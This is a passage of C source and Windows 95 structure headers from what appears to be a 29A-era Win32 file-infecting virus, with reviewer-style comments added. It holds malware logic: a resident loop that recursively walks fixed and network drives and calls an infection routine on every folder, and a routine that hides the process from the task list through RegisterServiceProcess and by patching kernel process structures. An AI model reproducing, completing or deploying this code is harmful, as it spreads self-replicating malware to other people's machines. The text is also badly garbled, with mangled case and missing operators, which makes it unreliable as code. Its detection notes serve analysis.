 * backwards until the preceding character is a separator or ':' or the start
 * of the string is reached. The function writes a terminator at PTGT and
 * returns PTGT.
 *
 * NOTE(review): the third loop is truncated on this page ("While (PSR"), so
 * what is copied into PTGT, and how far PTGT advances, cannot be confirmed
 * from this listing. The character literals shown as '//' and '/ x0' are
 * presumably a backslash and a NUL altered by text conversion - unconfirmed.
 */
Pbyte getendofpath (Pbyte PTGT, PBYTE PSR) {

PBYTE PTGTBEGIN = PTGT, PSREND = PSR;

While (* psrend );

While (PSR <--psrend && psrend [-1]! = '//' && psrend [-1]! = ':');

While (PSR

IF (PTGTBEGIN == PTGT || PTGT [-1]! = '//') * ((pword) ptgt) = './/';

* PTGT = '/ x0'; return (PTGT);

}

/*
 * RVA2RAW - translate a relative virtual address into a pointer inside the
 * current file mapping.
 *
 * Walks the section table of the PE header held in the global _phostpe. For
 * the first section whose virtual range contains RVA it returns
 * RVA - VirtualAddress + PointerToRawData, offset by the mapping base PMZ.
 * Returns NULL when no section matches.
 *
 * NOTE(review): the upper-bound comparison and the additions in the return
 * expression have lost their operators on this page; the description above
 * follows the operands that remain visible.
 */
PVOID RVA2RAW (DWORD RVA) {

PIMAGE_SECTION_HEADER PSECTIONHDR = image_first_section (_phostpe);

DWORD nsections = _phostpe-> fileheader.numberofsections;

Do {

IF (PsectionHDR-> VirtualAddress <= RVA &&

RVA VirtualAddress PsectionHDR-> Misc.Virtualsize)

Return (PVOID) (RVA - PsectionHDR-> VirtualAddress

PsectionHDR-> PointertorawData

(DWORD) PMZ);

PsectionHDR ;

WHILE (--NSECTIONS);

Return NULL;

}

#ifdef icon

/*
 * FixResources - walk a resource directory tree and adjust its data entries.
 *
 * Starting at the given directory, it visits every entry (named entries plus
 * ID entries). Entries flagged as directories are handled by recursion on the
 * sub-directory located relative to the global PRSRCSTART; for leaf entries
 * the OffsetToData field of the data entry is modified using the global
 * _Rvadelta. A NULL directory pointer returns immediately.
 *
 * NOTE(review): the first line fuses the signature with a local declaration,
 * the parameter is spelled "prcdir" there but "prsrcdir" in the body, and the
 * operator applied with _Rvadelta is missing - all artifacts of this page,
 * left as found.
 */
Void FixResources (pimage_resource_directory prcdir) {pimage_resource_directory_entry prsrcdirentry;

DWORD NCOUNT;

IF (! prsrcdir)

Return;

/* Directory entries follow the directory header directly. */
PRSRCDIRENTRY = (PIMAGE_RESOURCE_DIRECTORY_ENTRY (PRSRCDIR 1);

Ncount = prsrcdir-> numberofnamedentries prsrcdir-> numberofidentries;

DO

PRSRCDIRENTRY-> DataISDIRECTORY

FixResources (rva2ptr (pimage_resource_directory, // recursion ..

PRSRCSTART,

PRSRCDIRENTRY-> Offsettodirectory))))

: (RVA2PTR (PIMAGE_RESOURCE_DATA_ENTRY,

PRSRCSTART,

PRSRCDIRENTRY-> Offsettodata) -> Offsettodata

= _Rvadelta);

While (PRSRCDIRENTRY , --NCOUNT);

}

#define large_icon 0

#define small_icon 1

PiconImage getDefaulticon (PIMAGE_RESOURCE_DIRECTORY PRSRCDIR,

Boolb icontype,

Boolb bfalse) {

PIMAGE_RESOURCE_DIRECTORY_ENTRY PRSRCDIRENTRY

PIMAGE_RESOURCE_DATA_ENTRY PRSRCDATAENTRY

PiconImage PiconImage;

DWORD NCOUNT;

IF (! prsrcdir)

Return NULL;

PRSRCDIRENTRY = (PIMAGE_RESOURCE_DIRECTORY_ENTRY (PRSRCDIR 1);

Ncount = prsrcdir-> numberofnamedentries prsrcdir-> numberofidentries;

Do {

IF (! bfalse &&prcdirentry-> id! = (word) rt_icon)

CONTINUE;

IF (PRSRCDIRENTRY-> DataiRIRECTORY) {

PiconImage = getDefault (rva2ptr (pimage_resource_directory,

PRSRCSTART,

PRSRCDIRENTRY-> Offsettodirectory,

ICONTYPE,

True);

IF (! PiconImage)

CONTINUE;

Return PiconImage;

}

PRSRCDATAENTRY = RVA2PTR (pimage_resource_data_entry,

PRSRCSTART,

PRSRCDIRENTRY-> Offsettodata);

PiconImage = rva2raw (prcrcdataentry-> offsettodata);

IF (PiconImage-> ichead.bisize! = sizeof (bitmapinfohead) ||

PiconImage-> ichead.biwidth! = (iconType == Large_icon

? 32

: 16) ||

PiconImage-> icheader.biheight! = (iconType == LARGE_ICON? 64

: 32) ||

PiconImage-> icheader.biplanes! = 1 ||

PiconImage-> ichead.biBitcount! = 4)

CONTINUE;

Return PiconImage;

} While ( prrsrcdirentry, --ncount);

Return NULL;

}

Void getDefault (PiconImages PiconImages,

Pvoid ​​pneorpe) {

IF ((pimage_nt_headers) pnergype) -> Signature == Image_NT_SIGNATURE) {

PIMAGE_NT_HEADERS PPE = _phostpe = (pimage_nt_headers) PNeorpe;

PIMAGE_RESOURCE_DIRECTORY PRSRCDIR =

PRSRCSTART =

RVA2RAW (PPE-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

VirtualAddress;

PiconImages-> Plargeicon = getDefaulticon (prsrcdir, large_icon, false);

PiconImages-> psmallicon = getDefaulticon (prcrcdir, small_icon, false);

Return;

}

IF ((pimage_os2_header) -> ne_magic == image_os2_signature) {

PIMAGE_OS2_HEADER PNE = (PIMAGE_OS2_HEADER) PNEORPE;

Byte align = * RVA2PTR (Pbyte, PNE, PNE-> Ne_RSRCTAB);

PRESOURCE_TYPE

PRSRCTYPE = RVA2PTR (PRESOURCE_TYPE, PNE, PNE-> Ne_RSRCTAB 2),

PRSRCEND = RVA2PTR (PRESOURCE_TYPE, PNE, PNE-> Ne_Restab);

While (PRSRCTYPE ID) {

IF (PRSRCTYPE-> ID == (0x8000 | (WORD) RT_ICON)) {

PRESOURCE_INFO PRSRCINFO = (PRESOURCE_INFO) (PRSRCTYPE 1);

DWORD NCOUNT = 0;

Do {

PiconImage PiconImage = RVA2PTR (PiconImage,

PMZ,

PRSRCINFO -> offset << align;

IF (PiconImage-> ichead.bisize == sizeof (bitmapinfoheader) &&

PiconImage-> icheader.biplanes == 1 &&

PiconImage-> icheader.bibitcount == 4)

IF (! PiconImages-> Plargeicon &&

PiconImage-> icheader.biwidth == 32 && piconimage-> ichead.biheight == 64)

PiconImages-> Plargeicon = PiconImage;

Else

IF (! PiconImages-> PSMallicon &&

PiconImage-> icheader.biwidth == 16 &&

PiconImage-> ichead.biheight == 32)

Piconimages-> psmallicon = piconimage;

IF (PiconImages-> Plargeicon && PiconImages-> psmallicon)

Goto BreakAll;

WHILE ( ncount count);

}

PRSRCTYPE =

(PRESOURCE_TYPE)

(PBYTE) PRSRCTYPE SIZEOF (Resource_Type)

prcrctype-> count * sizeof (resource_info));

}

BREAKALL :;

}

}

#ENDIF

#ifdef TSR

/*
 * seektsr - resident search loop (TSR builds only).
 *
 * Obtains the list of logical drive strings into a heap buffer, optionally
 * sleeps prev_lapse seconds, then repeats forever: for each drive string it
 * queries GetDriveType and calls Walkfolder on the drive root unless the drive
 * is skipped. Only the msgbox (debug) build can leave the outer loop, through
 * the Cancelfolderseek flag.
 *
 * Drive filter as written: a type value <= drive_removable, or equal to
 * Drive_CDROM, is skipped. With the standard Win32 numbering that leaves
 * fixed, remote and RAM-disk drives in scope, so mapped network drives are
 * not excluded by this test - relevant when judging how far a resident copy
 * could reach from one machine.
 *
 * NOTE(review): several calls have lost arguments or parentheses on this page
 * (getLogicalDriveStrings, the second IF); left as found.
 */
__INline void seektsr () {

DWORD CBYTES;

PBYTE PSZDRVS, PSZDRIVE;

Uint UdriveType;

IF (! (cbytes = getLogicalDriveStrings) ||

! (pszdrvs = (pbyte) GlobalAlloc (LPTR, CBYTES 1)))))))))

Return;

IF (CBYTES, PSZDRVS) - 1

#if prev_lapse

/* Initial delay before the first pass, in seconds (prev_lapse). */
SLEEP (prev_lapse * 1000);

#ENDIF

Do {

Pszdrive = pszdrvs;

Do {

IF ((UDriveType = GetDriveType (pszdrive)) <= drive_removable ||

UDriveType == Drive_CDROM)

CONTINUE;

#ifdef msgbox

Cancelfolderseek

Cancelfolderseek = false;

#ENDIF

Walkfolder (lstrcpy (pathname, pszdrive);

/* Advance to the next string in the drive list; an empty string ends it. */
} while (* (pszdrive = lstrlen (pszdrive) 1));

#ifdef msgbox

Cancelfolderseek

Break;

#ENDIF

WHILE (TRUE);

#ifdef msgbox

CloseHandle (hmutex);

#if 1

MessageBox (NULL, "TSR: Mutex Destroyed!", Szcopyright, MB_OK;

#ENDIF

#ENDIF

}

#ifdef msgbox

GlobalFree (pszdrvs);

#ENDIF

}

/*
 * Walkfolder - process one folder, then recurse into its sub-folders.
 *
 * Sleeps seek_lapse seconds, calls InfectPath on the folder, appends a
 * wildcard pattern to the path and enumerates it with FindFirstFile /
 * FindNextFile. Entries that pass the isfolder macro (directory attribute set
 * and name not starting with '.') are appended to Pathname and visited
 * recursively. Pathname is modified in place and shared across the recursion.
 *
 * Behavioural note for detection: the per-folder sleep spreads file-system
 * activity out over time, so the resident copy shows as a slow, steady
 * directory walk rather than a burst.
 *
 * NOTE(review): the find-data variable is spelled three different ways below
 * and the closing brace of the do-loop is missing - artifacts of this page.
 */
Void Walkfolder (Pbyte Pathname) {

DWORD CBYTES;

Handle hfindfile;

Sleep (seek_lapse * 1000);

InfectPath (Pathname, CBYTES = LSTRLEN (Pathname);

IF (Pathname [CBYTES - 1]! = '//') Pathname [CBYTES ] = '//';

* (PDWORD) (Pathname CBYTES) = '*. *';

IF ((Hfindfile = FindfirstFile (Pathname, & FindataSr) ==

INVALID_HANDLE_VALUE)

Return;

Do {

#ifdef msgbox

Cancelfolderseek

Break;

#ENDIF

IF (! isfolder (& FindDataTSR))

CONTINUE;

LSTRCPY (Pathname CBytes, FindDataTSr.cfileName);

Walkfolder (Pathname); // Recurse Folders ..

WHILE (FindNextFile (Hfindfile, & Findata));

FindClose (HFindFile);

}

// void hideprocess () {// unsecure way to

// pthread_database pthreaddb = getthreaddb (); // hide out.

// if (pthreaddb-> pprocess-> type! = k32obj_process) // this is undocumented

// Return; // Microsoft Stuff,

// pthreaddb-> pprocess-> flags | = fservationprocess; // likely to gp fault!

//} // code bellow is better

/*
 * hideprocess - mark the current process as a service process (TSR builds).
 *
 * Two independent attempts are made:
 *  1. "RegisterServiceProcess" is resolved from Kernel32 at run time with
 *     GetProcAddress and, if present, called with arguments (0, 1).
 *  2. The process database pointer from getProcessDB() is read through
 *     ReadProcessMemory on the current process; when the Type field equals
 *     k32obj_process, a flag bit is ORed into the Flags field and written
 *     back with WriteProcessMemory.
 *
 * Scope: the header notes on this page state that the structure layout broke
 * on Win98 and that NT is out of scope, while the exported API still worked
 * on Win98.
 *
 * Detection notes: the API is looked up by name, so the literal string
 * "RegisterServiceProcess" is present in the binary rather than in the import
 * table; a process calling ReadProcessMemory / WriteProcessMemory on its own
 * pseudo-handle against kernel structures is unusual for ordinary
 * applications.
 *
 * NOTE(review): the flag identifier and some parentheses are mangled on this
 * page; left as found.
 */
Void hideprocess () {

{// do it the legal undoc. Way ..

DWORD (WinApi * PfnRegisterServiceProcess) (DWORD, DWORD);

PFNREGISTERSERVICEPROCESS =

(DWORD (WINAPI *) (DWORD, DWORD))

GetProcaddress (GetModuleHandle ("Kernel32"),

"RegisterServiceProcess");

IF (PFNREGISTERSERVICEPROCESS)

PfnRegisterServiceProcess (0, 1);

}

{// do it the legal dirty way, just in case ..

PPROCESS_DATABASE PPROCESSDB = getProcessDB ();

Handle hprocess = getCurrentProcess ();

DWORD dwbuffer, nbytes;

/* Reads go through ReadProcessMemory instead of direct dereference, so a bad
   pointer yields a failed call; any failed or short read returns early. */
IF (! ReadprocessMemory (HProcess, & PPRocessDB-> Type,

& dwbuffer, 4, & nbytes ||

NBYTES! = 4 || dwbuffer! = k32obj_process ||

ReadProcessMemory (HProcess, & PPRocessDB-> Flags,

& dwbuffer, 4, & nbytes ||

NBYTES! = 4)

Return;

Dwbuffer | = fservationProcess;

WriteProcessMemory (HProcess, & PProcessDB-> Flags,

& dwbuffer, 4, & nbytes);

}

}

/*
 * getprocessdb - return the process database pointer of the current process.
 *
 * Reads the 4-byte PProcess field of the thread database returned by
 * GetThreadDb() using ReadProcessMemory on the current process. Returns NULL
 * when the read fails or transfers fewer than 4 bytes.
 *
 * NOTE(review): relies on the undocumented Win95 layout declared in
 * win95sys.h; the conditional expression below is damaged on this page.
 */
__inline pprocess_database getprocessdb () {

PPROCESS_DATABASE PPROCESSDB;

DWORD NBYTES;

Return (! ReadprocessMemory (GetCurrentProcess (), & GetThreadDb () -> PPRocess,

& PPRocessDB, 4, & nbytes ||

NBYTES! = 4)

NULL? NULL

: pprocessdb;

}

/*
 * getthreaddb - return the current thread's database pointer.
 *
 * Implemented in inline assembly: EAX is loaded with -10h and then has a value
 * read through the FS segment (the TIB self-pointer field) added to it. There
 * is no C return statement; the result is whatever the assembly leaves in
 * EAX.
 *
 * NOTE(review): the -10h displacement presumably reflects where the TIB sits
 * inside the undocumented Win95 thread database - unconfirmed from this page.
 */
__inline pthread_database getthreaddb () {

__ASM PUSH -10H

__ASM POP EAX

__ASM Add Eax, FS: [Tib.ptibself (Eax 10h)] // (EAX 10H) = 0

}

#ENDIF

// end

---------------------------------------------------------------- [win32red.c] --

---------------------------------------------------------------- [win95sys.h] --

// Win95Sys - Win95 System Structure

//

// Some Powerful Win95 STRUCTS That Microsoft Dont Want US to Know About.

// These is much..............

// Last Minute Note (NOV / 10/98): Unfortunately Some of the Fields in these

// Structures Broke on Win98. More especification i dunno where the process

// Database Structure Lies in Memory. However the 'registerServiceProcess'

// API is still exported from kernel32 and sour Nasty trick with the

// 'Task Bar' Still Works There. Under NT this story is out of scope. Jq.

// kernel32 Objects

#define k32obj_semaphore 0x1

#define K32OBJ_EVENT 0x2

#define k32obj_mutex 0x3

#define k32obj_critical_section 0x4

#define k32obj_process 0x5

#define k32obj_thread 0x6

#define k32obj_file 0x7

#define k32obj_change 0x8

#define k32obj_console 0x9

#define k32obj_screen_buffer 0xa

#define k32obj_mem_mapped_file 0xB

#define k32obj_serial 0xc

#define k32obj_device_iocTl 0xD

#define k32obj_pipe 0xe

#define k32obj_mailslot 0xF

#define k32obj_toolhelp_snapshot 0x10

#define k32obj_socket 0x11

// Bit values for the Flags field of the process database (offset 20h in the
// process-database structure declared further down in this header).
// NOTE(review): the fDebugSingle (0x00000001) define appears to have been
// fused into the comment line below by the page extraction, so it is not an
// active definition in this copy.
// Process Database Flags # Define Fdebugsingle 0x00000001

#define fcreateprocessevent 0x00000002

#define fExitProcessEvent 0x00000004

#define FWIN16PROCESS 0x00000008

#define fDoSProcess 0x00000010

#define fconsoleprocess 0x00000020

#define ffileapisareoem 0x00000040

#define FNukeProcess 0x00000080

// Security-relevant bit: the code at the end of win32red.c in this listing
// ORs this value into the process database Flags field and writes it back
// with WriteProcessMemory. NOTE(review): this is presumably the "makes itself
// invisible" step from the file header; on Windows 95-family systems a
// process marked as a service process is left out of the task list, so triage
// on such a host should not rely on that list alone.
#define fserviceProcess 0x00000100

#define floginscripthack 0x00000800

// Thread Database Flags

#define fcreatethreadevent 0x00000001

#define fcancelexceptionAbort 0x00000002

#define fortempstack 0x00000004

#define fgrowableStack 0x00000008

#define fdelaysingLESTEP 0X00000010

#define fopenexeasimmovablefile 0x00000020

#define fcreatesuspended 0x00000040

#define fstackoverflow 0x00000080

#define fnestedcleanapcs 0x00000100

#define fwasoemnowansi 0x00000200

#define foktosetthreadoem 0x00000400

#pragma pack (1)

// modRef and Imte Structures

Typedef struct _modref {

Struct_modref * pnextmodref; // 00h

DWORD UN1; // 04H

DWORD UN2; // 08H

DWORD UN3; // 0CH

Word mteindex; // 10h

Word un4; //12h

DWORD UN5; / / 14H

Pvoid ​​PPDB; // 18h Pointer to Process Database

DWORD UN6; // 1CH

DWORD UN7; // 20h

DWORD UN8; // 24h

} ModRef, * pmodref;

Typedef struct _imte {

DWORD UN1; // 00h

PIMAGE_NT_HEADERS PNTHDR; / / 04H

DWORD UN2; // 08H

PSTR pszfilename; // 0ch

PSTR pszmodname; // 10h

Word cbfilename; // 14h

Word cbmodname; // 16h

DWORD UN3; // 18h

DWORD CSECTIONS; / / 1CH

DWORD UN5; // 20h

DWORD Baseaddress; // 24h

Word hmodule16; // 28h

Word cusage; // 2ah

DWORD UN7; / / 2CH

PSTR pszfilename2; // 30h

Word cbfilename2; // 34h

DWORD PSZMODNAME2; // 36H

Word CBModName2; // 3ah

} Imte, * pimte;

// Process Database Structure

Typedef struct _ENVIRONMENT_DATABASE {

PSTR pszenvironment; // 00h Pointer to EnvironmentDWORD UN1; // 04H

PSTR pszcmdline; // 08h Pointer to Command Line

PSTR pszcurdirectory; // 0ch Pointer to current Directory

LPStartupinfoa Pstartupinfo; // 10h Pointer to Startupinfoa Struct

Handle hstdin; // 14h standard Input

Handle hstdout; // 18h Standard OUTPUT

Handle hstderr; // 1ch standard Error

DWORD UN2; // 20h

DWORD inheritconsole; // 24h

DWORD BREAKTYPE; / / 28H

DWORD BREAKSEM; / / 2CH

DWORD BREAKEVENT; // 30h

DWORD BREAKTHREADID; // 34H

DWORD BREAKHANDLERS; // 38H

} Environment_Database, * penvironment_database;

Typedef struct _handle_table_entry {

DWord Flags; // Valid Flags Depend On What Type of Object this IS

Pvoid ​​Pobject; // Pointer to the Object That The Handle Refers To

} Handle_Table_Entry, * Phandle_Table_ENTRY;

Typedef struct _handle_table {

DWORD CENTRIES; // Max Number of Handles in Table

Handle_table_entry array [1]; // an array (number is given by centries)

} Handle_Table, * Phandle_Table;

Typedef struct _process_database {

DWORD TYPE; // 00H kernel32 Object Type (5)

DWord Creference; // 04h Number of References To Process

DWORD UN1; // 08H

DWORD Someevent; // 0ch An Event Object (what's it used for ???)

DWORD TERMINATIONSTATUS; // 10h Returned by getExitcodeProcess

DWORD UN2; // 14h

DWord defaultheap; // 18h Address of the Process HEAP

DWORD MEMORYCONTEXT; / / 1CH POINTER TO The Process's Context

DWORD FLAGS; // 20h

// 0x00000001 - FDEBUGSINGLE

// 0x00000002 - FcReateProcessEvent

// 0x00000004 - FEXITPROCESSEVENT

// 0x00000008 - FWIN16PROCESS

// 0x00000010 - FDoSProcess

// 0x00000020 - FconsoleProcess

// 0x00000040 - FFileApisareoem

// 0x00000080 - FNukeProcess

// 0x00000100 - FServiceProcess

// 0x00000800 - FloginscripthackDword PPSP; // 24h LINEAR ADDRESS OF PSP?

Word pspselector; // 28h

Word mteindex; // 2ah

Word cthreads; // 2ch

Word CNottermthreads; // 2EH

Word UN3; // 30h

Word CRING0THREADS; // 32H Number of Ring 0 threads

Handle Heaphandle; // 34h Heap to Allocate Handle Tables Out of

// this seems to always be the kernel32 heap

Htask W16TDB; // 38h Win16 Task Database Selector

DWORD MEMMAPFILES; // 3ch memory mapped file list (?)

Penvironment_database PEDB; // 40h Pointer to Environment Database

Phandle_Table Phandletable; // 44h Pointer to Process Handle Table

Struct _process_database * parentpdb; // 48h Parent Process Database

PmodRef modReflist; // 4ch module Reference List

DWORD thREADLIST; // 50h Threads in this process

DWORD DEBUGEECB; / / 54H Debuggee Context Block?

DWord localheapfreehead; // 58h Head of Free List in Process HEAP

DWORD INITIALRING0ID; // 5ch

Critical_section crst; // 60h

DWORD UN4 [3]; // 78H

DWORD PCONSOLE; // 84H Pointer to Console for Process

DWORD TLSINUSEBITS1; // 88H // REPRESENTS TLS INDES 0 - 31

DWORD TLSINUSEBITS2; // 8CH // Repesents TLS INDES 32 - 63

DWORD processdword; // 90h

Struct _process_database * processgroup; // 94h

DWORD PEXEMODREF; // 98H Pointer to EXE's Modref

DWORD TOPEXCFILTER; / / 9CH TOP EXCEPTION FILTER?

DWord BasePriority; // A0H Base Scheduling Priority for Process

DWORD HeapownList; // A4H Head of the List of Process Heaps

DWord HeapHandleblockList; // A8H Pointer to Head of Heap Handle Block List

DWORD PSOMEHEAPPTR; // Ach Normal Zero, But Can a Pointer TO A

// Moveable Handle Block in the HEAP

DWORD PCONSOLEPROVIDER; // B0H Process That OWNS THE CONSOLE WE 'A

Word Environselector; // b4h selector Containing process environmentword errorMode; // b6h setErrorMode Value (Also Thunks to Win16)

DWORD pevtloadfinished; // b8h Pointer to Event LoadFinished?

Word utState; // bch

} Process_Database, * pprocess_database;

// TIB (Thread Information Block) structure

Typedef struct _seh_record {

Struct _seh_record * pnext;

FarProc PfnHandler;

} SEH_RECORD, * PSEH_Record;

// This is semi-documented in the NTDDK.H file from the NT DDK

Typedef struct_tib {

PSEH_Record PVEXCEPT; // 00h Head of Exception Record List

Pvoid ​​PvStackUsertop; // 04h Top of User Stack

Pvoid ​​PvStackuserBase; // 08H Base of User Stack

Word pvtdb; // 0ch tdb

Word pvthunksss; // 0eh ss selector used for thunking to 16 bits

DWORD SELMANLIST; / / 10H

PVOID PVARBITRARY; / / 14H Available for Application USE

Struct_tib * ptibself; // 18h Linear Address of Tib Structure

Word Tibflags; // 1ch

Word win16mutexcount; // 1eh

DWORD DebugContext; // 20h

DWORD PCURRENTPRIORITY; / / 24H

DWORD PVQUEUE; // 28h Message Queue Selector

PVOID * PVTLSARRAY; // 2ch thread local storage array

} TIB, * PTIB;

// TDBX Structure

Typedef struct _tdbx {

DWORD PTDB; // 00h // pthread_database

DWORD PPDB; // 04H // PPROCESDS_DATABASE

DWORD contexthandle; // 08h

DWORD UN1; // 0CH

DWord TimeoutHandle; // 10h

DWORD WAKEPARAM; / / 14H

DWORD blockHandle; // 18h

DWORD blockState; // 1ch

DWORD SUSPENDCOUNT; / / 20H

DWORD SUSPENDHANDLE; / / 24H

DWORD MUSTCOMPLETECUNT; / / 28H

DWORD waitexflags; // 2ch

// 0x00000001 - Waitexbit

// 0x00000002 - WaitackBIT

// 0x00000004 - SUSPEND_APC_PENDING

// 0x00000008 - SUSPEND_TERMINATED

// 0x00000010 - blocked_for_termination

// 0x00000020 - Emulation_npx

// 0x00000040 - Win32_npx

// 0x00000080 - Extended_Handles // 0x00000100 - Frozen

// 0x00000200 - DONT_FREEZE

// 0x00000400 - DONT_UNFREEZE

// 0x00000800 - DONT_TRACE

// 0x00001000 - STOP_TRACING

// 0x00002000 - waiting_for_crst_safe

// 0x00004000 - CRST_SAFE

// 0x00040000 - Block_Terminate_APC

DWORD SYNCWAITCOUNT; // 30h

DWORD QueuedSyncFuncs; // 34h

DWORD USERAPCLIST; // 38H

DWord kernapClist; // 3ch

DWORD PPMPSPSELECTOR; // 40h

DWORD blockEDONID; // 44H

DWORD UN2 [7]; // 48h

DWORD TRACEREFDATA; / / 64H

DWORD TRACALLBACK; / / 68H

DWORD TRACEEVENTHANDLE; / / 6CH

Word traceOutlastcs; //70h

Word K16TDB; // 72H

Word K16PDB; // 74H

Word dospdbseg; // 76h

Word exception; // 78h

} TDBX, * PTDBX;

// Thread Database Structure

Typedef struct _thread_database {

DWORD TYPE; / / 00H

DWORD CREGERENCE; // 04H

PPRocess_Database pprocess; // 08h

DWORD Someevent; // 0ch An Event Object (what's it used for ???)

DWORD PVEXCEPT; // 10h this field through field 3ch is a Tib

// structure (see tib.h)

DWORD TOPOFSTACK; / / 14H

DWORD stacklow; // 18h

Word W16TDB; // 1ch

Word Stackselector16; // 1eh used when thunking down to 16 bits

DWORD SELMANLIST; / / 20H

DWORD Userpoint; // 24h

PTIB PTIB; // 28h

Word Tibflags; // 2ch Tibf_Win32 = 1, TIBF_TRAP = 2

Word win16mutexcount; // 2eh

DWord DebugContext; // 30h

PDWORD PCURRENTPRIORITY; / / 34H

DWORD MessageQueue; // 38h

DWORD PTLSARRAY; / / 3CH

PPROCESS_DATABASE PPROCESS2; // 40h Another Copy of The Thread's Process ???

DWORD flags; // 44h

// 0x00000001 - FcreateThreadEvent

// 0x00000002 - FcancelexceptionAbort

// 0x00000004 - FontempStack

// 0x00000008 - FGROWABLESTACK

// 0x00000010 - FDELAYSINGLESTEP

// 0x00000020 - FopenexeasimmovableFile

// 0x00000040 - FcreateSuspended // 0x00000080 - Fstackoverflow

// 0x00000100 - FnestedCleanapcs

// 0x00000200 - fwasoemnowansi

// 0x00000400 - FokTosetthreadoem

DWord TerminationStatus; // 48h returned by getExitcodetteread

Word TibSelector; // 4ch

Word emulatorselector; // 4eh

DWORD chandles; // 50h

DWORD WAITNODELIST; / / 54H

DWORD UN4; / / 58H

DWord Ring0Thread; // 5ch

PTDBX PTDBX; // 60

DWORD stackbase; // 64h

DWORD TERMINATIONSTACK; / / 68H

DWORD EmulatorData; // 6ch

DWORD getLastErrorCode; //70h

DWORD Debuggercb; // 74H

DWord Debuggerthread; // 78H

PContext threadContext; // 7ch // register context defined in Winnt.h

DWORD EXCEPT16LIST; / / 80H

DWORD thunkconnect; // 84h

DWord NegstackBase; // 88H

DWORD CURRENTSS; / / 8CH

DWORD SSTABLE; / / 90H

DWORD THUNKSS16; // 94H

DWORD TLSARRAY [64]; // 98H

DWord deltapriority; // 198h

// The retail version breaks offs off here.

// all the remaining fields area most debugity

DWORD UN5 [7]; // 19ch

DWORD PCREATEDATA16; // 1B8H

DWord Apisuspendcount; // 1bch # of Times Suspendthread Has Been Called

DWORD UN6; // 1C0H

DWORD wowchain; // 1C4H

Word wssbig; // 1C8H

Word un7; // 1cah

DWord LP16SwitchRec; // 1cch

DWORD UN8 [6]; // 1D0H

DWORD PSOMECRITSECT1; // 1e8h

DWORD PWIN16MUTEX; // 1ech

DWORD PWIN32MUTEX; // 1f0h

DWORD PSOMECRITSECT2; // 1F4H

DWORD UN9; // 1F8H

DWORD RIPSTRING; / / 1FCH

DWORD LasttlssetValueeiP [64]; // 200h (Parallel to TLSARRAY, Contains EIP

// Where TLS Value Was Last Set from)

} Thread_database, * pthread_database;

??????????????????????????????????????????? ?????????????? [win95sys.h]??

??????????????????????????????????????????? ?????????????? [jqcoding.h]??

/ *

JQCoding.h - SUPERTINY / FAST COMPRESSION / Encryption Library - C / C Header (c) 1998 by Jacky QWERTY / 29A.

* /

// Declaration of the encoder from the author's JQCODING library; the
// implementation is not part of this listing.
//
// The signature carries the input length but no capacity for `out`, so
// nothing in the interface bounds the write to the output buffer; the caller
// alone is responsible for sizing it.
// NOTE(review): the return value is presumably the number of bytes produced
// and MEM64K presumably a 64 KB scratch area (going by its name) - neither
// is established by this header; confirm against the implementation.
Unsigned long

__stdcall

JQ_Encode (void * out, / * Output stream ptr * /

Const void * in, / * Input stream ptr * /

Unsigned long in_len, / * input stream length * /

Void * MEM64K); / * WORK MEM PTR * /

// Declaration of the decoder from the author's JQCODING library; the
// implementation is not part of this listing.
//
// As with the encoder, only the input length is passed: the interface gives
// the decoder no way to know how large `out` is, so a decoded stream longer
// than the caller expected cannot be rejected at this boundary.
// NOTE(review): the return value is presumably the decoded length and MEM64K
// presumably a 64 KB scratch area - confirm against the implementation.
Unsigned long

__stdcall

jq_decode (void * out, / * Output stream ptr * /

Const void * in, / * Input stream ptr * /

Unsigned long in_len, / * input stream length * /

Void * MEM64K); / * WORK MEM PTR * /

??????????????????????????????????????????? ?????????????? [jqcoding.h]??

??????????????????????????????????????????? ?????????????? [winicons.h]??

// Win16 / 32 related icon structures ..

#include

#define sizeof_large_icon 0x2e8

#define sizeof_small_ICON 0x128

#DEFINE SIZEOF_ICONS (SIZEOF_LARGE_ICON SIZEOF_SMALL_ICON)

// icon format (id = 03h)

Typedef struct _iconimage {

BitmapInfoHeader iCheader; // Dib HEADER

RGBQUAD ICCOLORS [1]; // Color Table

Byte ICXOR [1]; // DIB Bits for xor mask

Byte icand [1]; // Dib Bits for and Mask

} Iconimage, * piconimage;

// Group icon format (id = 0EH)

Typedef struct _icondirentry {

Byte Bwidth; // Width, in Pixels, of the Image

Byte Bheight; // Height, In Pixels, of the Image

Byte Bcolorcount; // Number of Colors in Image (0 if> = 8bpp)

BYTE BRESERVED; // Reserved

Word Wplanes; // Color Plaso

Word wbitcount; // bits per pixel

DWORD DWBYTESINRES; // How Many Bytes in this resource?

Word nid; // the ID

} ICondirentry, * picondirentry;

#define sizeof_icondirentry sizeof (iCondirentry)

Typedef struct _icondir {

Word idReserved; // reserved (Must BE 0)

Word IDtype; // resource type (1 for icons)

Word IDcount; // How Many images?

IconDirentry IdeNtries [1]; // The Entries for Each Image} ICONDIR, * Picondir;

#define sizeof_icondir 6

??????????????????????????????????????????? ?????????????? [winicons.h]??

??????????????????????????????????????????? ???????????????? [winRes.h]??

// Win16 (ne) related structures ..

Typedef struct {

Word ID;

Word count;

DWORD FUNCTION;

} Resource_type, * pResource_Type;

Typedef struct {

Word offset;

Word Length;

Word flagg;

Word ID;

Word Handle;

Word usage;

} Resource_info, * PRESOURCE_INFO;

??????????????????????????????????????????? ???????????????? [winRes.h]??

??????????????????????????????????????????? ?????????????? [jq29aico.h]??

#ifdef compr

Byte jq29acompricons [] = {

0xD7, 0X45, 0XB1, 0X44, 0XC6, 0X7D, 0x61, 0XA8, 0X96, 0XC0, 0X9D, 0x74, 0XBB,

0x6D, 0xBC, 0x6B, 0xA0, 0XA6, 0X57, 0XC8, 0X76, 0X77, 0X64, 0X0C, 0x7E, 0x9A,

0x2F, 0xB8, 0X2, 0XCD, 0XBC, 0XA3, 0XA0, 0X33, 0X50, 0X3B, 0X90, 0X3B, 0X1F,

0x46, 0xE9, 0xB2, 0X7F, 0xE4, 0X4E, 0X28, 0X13, 0X4E, 0xFA, 0x92, 0x3e, 0xcc,

0xD1, 0xc3, 0x92, 0x95, 0x1c, 0x5e, 0xda, 0xaf, 0x45, 0x91, 0x44, 0xee, 0xc7,

0x95, 0x31, 0x04, 0x13, 0x3d, 0x1c, 0x23, 0x5d, 0xa1, 0x59, 0xa9, 0x34, 0x0e,

0x7a, 0x92, 0x3f, 0x65, 0xAc, 0x3e, 0x67, 0xa8, 0x4b, 0x8d, 0x7c, 0x9e, 0x27,

